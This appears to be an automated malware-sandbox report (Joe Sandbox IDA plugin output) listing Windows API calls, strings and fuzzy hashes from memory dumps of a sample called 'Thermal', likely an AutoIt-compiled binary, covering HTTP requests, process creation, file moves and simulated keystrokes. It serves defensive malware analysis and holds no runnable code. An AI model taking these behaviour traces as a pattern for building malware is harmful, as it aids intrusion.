                                                • SetBkMode.GDI32(?,00000001), ref: 0077262C
                                                • GetStockObject.GDI32(00000005), ref: 00772634
                                                • GetClientRect.USER32(?), ref: 007AC0FC
                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 007AC113
                                                • GetWindowDC.USER32(?), ref: 007AC11F
                                                • GetPixel.GDI32(00000000,?,?), ref: 007AC12E
                                                • ReleaseDC.USER32(?,00000000), ref: 007AC140
                                                • GetSysColor.USER32(00000005), ref: 007AC15E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                • String ID:
                                                • API String ID: 3430376129-0
                                                • Opcode ID: c510897d4eb851a36b800b4d59878321bc4152b2938b8129db8eefca6a392a24
                                                • Instruction ID: c1a8320f1d4a693146028ae1d96763b63fc5166600f04e3068a3c21effcb62fa
                                                • Opcode Fuzzy Hash: c510897d4eb851a36b800b4d59878321bc4152b2938b8129db8eefca6a392a24
                                                • Instruction Fuzzy Hash: 01115E31500205BFDBA16FA4EC09BE97BB2FF59322F104265FA79A50E2CB360951EF11
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0077ADE1
                                                • OleUninitialize.OLE32(?,00000000), ref: 0077AE80
                                                • UnregisterHotKey.USER32(?), ref: 0077AFD7
                                                • DestroyWindow.USER32(?), ref: 007B2F64
                                                • FreeLibrary.KERNEL32(?), ref: 007B2FC9
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 007B2FF6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 469580280-3243417748
                                                • Opcode ID: 1f9b166ec0689203960d97343d6289739bd50110f2241ab127a5e943fbeb7398
                                                • Instruction ID: 2a12bac1e41cdc44508d531ab9d48d43ad5b7364ed791382936b7cc05a2d8d2b
                                                • Opcode Fuzzy Hash: 1f9b166ec0689203960d97343d6289739bd50110f2241ab127a5e943fbeb7398
                                                • Instruction Fuzzy Hash: B0A15D70701212DFDB29EF14C499B69F365BF44740F1082ADE50AAB252DB39ED52CF91
                                                APIs
                                                • EnumChildWindows.USER32(?,007CB13A), ref: 007CB078
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ChildEnumWindows
                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                • API String ID: 3555792229-1603158881
                                                • Opcode ID: 86327b23fdf8c6797cc30211a6b5de248f6fbcd41460754735f9af38b33c4730
                                                • Instruction ID: 0847b6c70fc47fcaffebdef5bb8028d77df0e6e7edb56e15f7ed75b1252c7c4e
                                                • Opcode Fuzzy Hash: 86327b23fdf8c6797cc30211a6b5de248f6fbcd41460754735f9af38b33c4730
                                                • Instruction Fuzzy Hash: 6791B37060011AEBCB18EFA0D486FEEFB74BF14304F50811DE95AA7151DF38A999CBA1
                                                APIs
                                                • SetWindowLongW.USER32(?,000000EB), ref: 0077327E
                                                  • Part of subcall function 0077218F: GetClientRect.USER32(?,?), ref: 007721B8
                                                  • Part of subcall function 0077218F: GetWindowRect.USER32(?,?), ref: 007721F9
                                                  • Part of subcall function 0077218F: ScreenToClient.USER32(?,?), ref: 00772221
                                                • GetDC.USER32 ref: 007AD073
                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007AD086
                                                • SelectObject.GDI32(00000000,00000000), ref: 007AD094
                                                • SelectObject.GDI32(00000000,00000000), ref: 007AD0A9
                                                • ReleaseDC.USER32(?,00000000), ref: 007AD0B1
                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007AD13C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                • String ID: U
                                                • API String ID: 4009187628-3372436214
                                                • Opcode ID: c4bd4ed98c954e3918f67afe483719d724b02ba75014430aabb44bcba2adc09e
                                                • Instruction ID: 1c5de56dae0ab649b05b17625877c4c26927df512993b5dc1afce6d7a3994027
                                                • Opcode Fuzzy Hash: c4bd4ed98c954e3918f67afe483719d724b02ba75014430aabb44bcba2adc09e
                                                • Instruction Fuzzy Hash: E871B130504209DFCF318F64C884ABA7BB5FF8A360F148369ED565A266C7398D41DF60
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                  • Part of subcall function 00772714: GetCursorPos.USER32(?), ref: 00772727
                                                  • Part of subcall function 00772714: ScreenToClient.USER32(008377B0,?), ref: 00772744
                                                  • Part of subcall function 00772714: GetAsyncKeyState.USER32(00000001), ref: 00772769
                                                  • Part of subcall function 00772714: GetAsyncKeyState.USER32(00000002), ref: 00772777
                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 007FC69C
                                                • ImageList_EndDrag.COMCTL32 ref: 007FC6A2
                                                • ReleaseCapture.USER32 ref: 007FC6A8
                                                • SetWindowTextW.USER32(?,00000000), ref: 007FC752
                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007FC765
                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 007FC847
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                • API String ID: 1924731296-2107944366
                                                • Opcode ID: c8a03ab68c2908f880e35086aaa48d6f5b4289d0326b3c7e1fc6d61f332e315b
                                                • Instruction ID: f2d0a02d2735fd7e1cdd0eb0a8f217f5a19a63e26e61288182110895b41fbcb3
                                                • Opcode Fuzzy Hash: c8a03ab68c2908f880e35086aaa48d6f5b4289d0326b3c7e1fc6d61f332e315b
                                                • Instruction Fuzzy Hash: A3518C70208308EFDB14EF14CC59F6A7BE5FB84350F008929F6A5872A1CB75A945CB62
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007E211C
                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007E2148
                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007E218A
                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007E219F
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007E21AC
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007E21DC
                                                • InternetCloseHandle.WININET(00000000), ref: 007E2223
                                                  • Part of subcall function 007E2B4F: GetLastError.KERNEL32(?,?,007E1EE3,00000000,00000000,00000001), ref: 007E2B64
                                                  • Part of subcall function 007E2B4F: SetEvent.KERNEL32(?,?,007E1EE3,00000000,00000000,00000001), ref: 007E2B79
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                • String ID:
                                                • API String ID: 2603140658-3916222277
                                                • Opcode ID: c6d81c2a661b38c6e086942be3078e039e4b1d370913824e692bb05824f13809
                                                • Instruction ID: aae34abee6e98d17172288efa9972ae70287d2e7dda258142e823ea0e8ccbeb2
                                                • Opcode Fuzzy Hash: c6d81c2a661b38c6e086942be3078e039e4b1d370913824e692bb05824f13809
                                                • Instruction Fuzzy Hash: 6C4181B1502248BFEB129F51CC89FBB7BACFF0C354F004116FA059A142DB799E469BA1
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00800980), ref: 007E9412
                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00800980), ref: 007E9446
                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007E95C0
                                                • SysFreeString.OLEAUT32(?), ref: 007E95EA
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                • String ID:
                                                • API String ID: 560350794-0
                                                • Opcode ID: d9569221d892d0dbbc78432ba3b1b1625225da5cefe2e2f9c199b6482a685e24
                                                • Instruction ID: f76b2a2611693b4f8b7be2f92bf24155d4e924028463f016e4800df085ef7c59
                                                • Opcode Fuzzy Hash: d9569221d892d0dbbc78432ba3b1b1625225da5cefe2e2f9c199b6482a685e24
                                                • Instruction Fuzzy Hash: D5F13B72A01209EFCF14DF95C888EAEB7B9FF49314F148058F616AB291DB35AE45CB50
                                                APIs
                                                • _memset.LIBCMT ref: 007EFD9E
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EFF31
                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007EFF55
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EFF95
                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007EFFB7
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007F0133
                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007F0165
                                                • CloseHandle.KERNEL32(?), ref: 007F0194
                                                • CloseHandle.KERNEL32(?), ref: 007F020B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                • String ID:
                                                • API String ID: 4090791747-0
                                                • Opcode ID: bc46bb4299b6709a54472b6fc9c24de1664b042059ee7826cfba9e4da9c15844
                                                • Instruction ID: a28f84035055b1c5400ed4df8ae6b59a00d4bcbd046c84198336fc8e9fbdde5a
                                                • Opcode Fuzzy Hash: bc46bb4299b6709a54472b6fc9c24de1664b042059ee7826cfba9e4da9c15844
                                                • Instruction Fuzzy Hash: 6EE1A131204341DFCB14EF25C895B6ABBE1AF89350F14845DF5999B3A2DB39EC41CB92
                                                APIs
                                                  • Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007D3B8A,?), ref: 007D4BE0
                                                  • Part of subcall function 007D4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007D3B8A,?), ref: 007D4BF9
                                                  • Part of subcall function 007D4FEC: GetFileAttributesW.KERNEL32(?,007D3BFE), ref: 007D4FED
                                                • lstrcmpiW.KERNEL32(?,?), ref: 007D52FB
                                                • _wcscmp.LIBCMT ref: 007D5315
                                                • MoveFileW.KERNEL32(?,?), ref: 007D5330
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                • String ID:
                                                • API String ID: 793581249-0
                                                • Opcode ID: 8791429578984f31a1ebba0987f4d9a3a9bbc2f373ed2f6c4da7eb4399befb9c
                                                • Instruction ID: 5e2f9a9302f9731e6edfc5a47bc2787a77d3394d761dd7edf37502107234e8de
                                                • Opcode Fuzzy Hash: 8791429578984f31a1ebba0987f4d9a3a9bbc2f373ed2f6c4da7eb4399befb9c
                                                • Instruction Fuzzy Hash: E15176B20087859BC764EBA0D8859DFB3ECAF84301F50491FF189D3152EF38A6898766
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007F8D24
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: 2345f7f48202def8a0a7f2dec4871ebe37a3d6b9cb48b57b0ec2319fdc8e82af
                                                • Instruction ID: 4edfb87e470497b3c5cdc2e7848dbe42b02e6205f8a7afc22a89b5120f5aebe0
                                                • Opcode Fuzzy Hash: 2345f7f48202def8a0a7f2dec4871ebe37a3d6b9cb48b57b0ec2319fdc8e82af
                                                • Instruction Fuzzy Hash: 6651A03064020CFEEFA09B28CC89BB93B64BF04350F244551F724EA3E1CF79A950DA62
                                                APIs
                                                • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007AC638
                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007AC65A
                                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007AC672
                                                • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007AC690
                                                • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007AC6B1
                                                • DestroyIcon.USER32(00000000), ref: 007AC6C0
                                                • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007AC6DD
                                                • DestroyIcon.USER32(?), ref: 007AC6EC
                                                  • Part of subcall function 007FAAD4: DeleteObject.GDI32(00000000), ref: 007FAB0D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                • String ID:
                                                • API String ID: 2819616528-0
                                                • Opcode ID: 12bedcb77c302444520a588d81e5800effea0df870069f8e439949c4a3e9ee7c
                                                • Instruction ID: 2612a8633651fff21989dcc968745ef678602e0311ec7e33e95266e4b240337e
                                                • Opcode Fuzzy Hash: 12bedcb77c302444520a588d81e5800effea0df870069f8e439949c4a3e9ee7c
                                                • Instruction Fuzzy Hash: EA514770600209EFDF24DF24CC49BAA77B5FB84750F108A28F956A72A0DB79E991DB50
                                                APIs
                                                  • Part of subcall function 007CB52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007CB54D
                                                  • Part of subcall function 007CB52D: GetCurrentThreadId.KERNEL32 ref: 007CB554
                                                  • Part of subcall function 007CB52D: AttachThreadInput.USER32(00000000,?,007CA23B,?,00000001), ref: 007CB55B
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007CA246
                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007CA263
                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007CA266
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007CA26F
                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007CA28D
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007CA290
                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 007CA299
                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007CA2B0
                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007CA2B3
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                • String ID:
                                                • API String ID: 2014098862-0
                                                • Opcode ID: cf6e0f5a58aae95cf03da004b4b503480509ced0672b7d69ed41e84c89f064df
                                                • Instruction ID: 4240c48d7e9a8684220fba218da0ea28fbe4ff9fb19b6d9404ad5076158ebfbf
                                                • Opcode Fuzzy Hash: cf6e0f5a58aae95cf03da004b4b503480509ced0672b7d69ed41e84c89f064df
                                                • Instruction Fuzzy Hash: 0211E1B1A50218BEF7106F609C8AF6A3B2DEB8C765F100419F354AB0D1CAF35C609EA0
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,007C915A,00000B00,?,?), ref: 007C94E2
                                                • HeapAlloc.KERNEL32(00000000,?,007C915A,00000B00,?,?), ref: 007C94E9
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,007C915A,00000B00,?,?), ref: 007C94FE
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,007C915A,00000B00,?,?), ref: 007C9506
                                                • DuplicateHandle.KERNEL32(00000000,?,007C915A,00000B00,?,?), ref: 007C9509
                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,007C915A,00000B00,?,?), ref: 007C9519
                                                • GetCurrentProcess.KERNEL32(007C915A,00000000,?,007C915A,00000B00,?,?), ref: 007C9521
                                                • DuplicateHandle.KERNEL32(00000000,?,007C915A,00000B00,?,?), ref: 007C9524
                                                • CreateThread.KERNEL32(00000000,00000000,007C954A,00000000,00000000,00000000), ref: 007C953E
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 195933b0e5a299dd6e1ed1cae15ed52aa1673d12bcabf8d6e90838b24e3a3a21
                                                • Instruction ID: 6ee8b91d3e990868b2ae2bcb146822e83068c72c3e5bad92259afa69b5b2ad0e
                                                • Opcode Fuzzy Hash: 195933b0e5a299dd6e1ed1cae15ed52aa1673d12bcabf8d6e90838b24e3a3a21
                                                • Instruction Fuzzy Hash: 1901B6B5640308BFE791ABA5DC4DF6B7BACFB89711F108411FA05DB2A1CA749800CF20
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: NULL Pointer assignment$Not an Object type
                                                • API String ID: 0-572801152
                                                • Opcode ID: 68edd76b167b980c9fcb92b5d832e53d9d44bd4dad4b176c7328f39f6c210cb3
                                                • Instruction ID: 024f40e5f92c59aea5b7ff66138fb4f5ded33ee7105ebd5efa7a1f819e68f471
                                                • Opcode Fuzzy Hash: 68edd76b167b980c9fcb92b5d832e53d9d44bd4dad4b176c7328f39f6c210cb3
                                                • Instruction Fuzzy Hash: 75C1A171A0125AAFDF10CF99C884BAEB7F5FF48314F148469E915AB280E778AD44CB51
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$_memset
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 2862541840-625585964
                                                • Opcode ID: 8325569d312ec82d3847100381135e49fa5f532dbed5d7d997722164c64bdf0c
                                                • Instruction ID: 2f3f7609f6ee94e030cfdbea5fbf49b8c92a2071f67ae7bcea653ddf42f617ce
                                                • Opcode Fuzzy Hash: 8325569d312ec82d3847100381135e49fa5f532dbed5d7d997722164c64bdf0c
                                                • Instruction Fuzzy Hash: A191A372A01259ABCF24CF96C844F9EB7B8EF49714F10815DF615AB241D778A944CFA0
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007F7449
